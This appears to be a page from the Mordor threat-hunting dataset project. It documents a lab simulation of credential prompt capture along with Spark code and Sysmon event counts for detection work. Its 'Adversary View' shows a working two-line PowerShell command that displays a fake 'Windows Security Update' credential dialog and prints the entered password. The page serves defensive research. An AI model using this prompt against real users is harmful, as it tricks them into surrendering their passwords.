.ipynb .pdf

repository open issue suggest edit

Binder Colab Live Code

Contents

UI Prompt For Credentials Function

Metadata

Author	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2020/10/20
Modification Date	2020/10/20
Tactics	[‘TA0006’, ‘TA0009’]
Techniques	[‘T1056.002’]
Tags	[‘art.2b162bfd-0928-4d4c-9ec3-4d9f88374b52’]

Dataset Description

This dataset represents adversaries leveraging functions such as CredUIPromptForCredentials to create and display a configurable dialog box that accepts credentials information from a user.

Datasets Downloads

Dataset Type	Link
Host	https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/psh_input_capture_promptforcreds.zip

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author	Name	Link

Simulation Plan

Environment	Tool Type	Module
Lab VM	Manual	powershell

Adversary View

PS > $cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
PS > write-warning $cred.GetNetworkCredential().Password
WARNING: testing
PS >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/psh_input_capture_promptforcreds.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)

+------------+------------------------------------+-------+-----+
|Hostname    |Channel                             |EventID|count|
+------------+------------------------------------+-------+-----+
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|10     |98   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|13     |18   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|7      |16   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|12     |15   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|11     |7    |
|WORKSTATION5|Security                            |5156   |2    |
|WORKSTATION5|Security                            |5158   |2    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|9      |1    |
|WORKSTATION5|Security                            |5379   |1    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|23     |1    |
|WORKSTATION5|Security                            |1102   |1    |
|WORKSTATION5|System                              |104    |1    |
+------------+------------------------------------+-------+-----+

Psexec Reg LSA Secrets Dump Empire Mimikatz LogonPasswords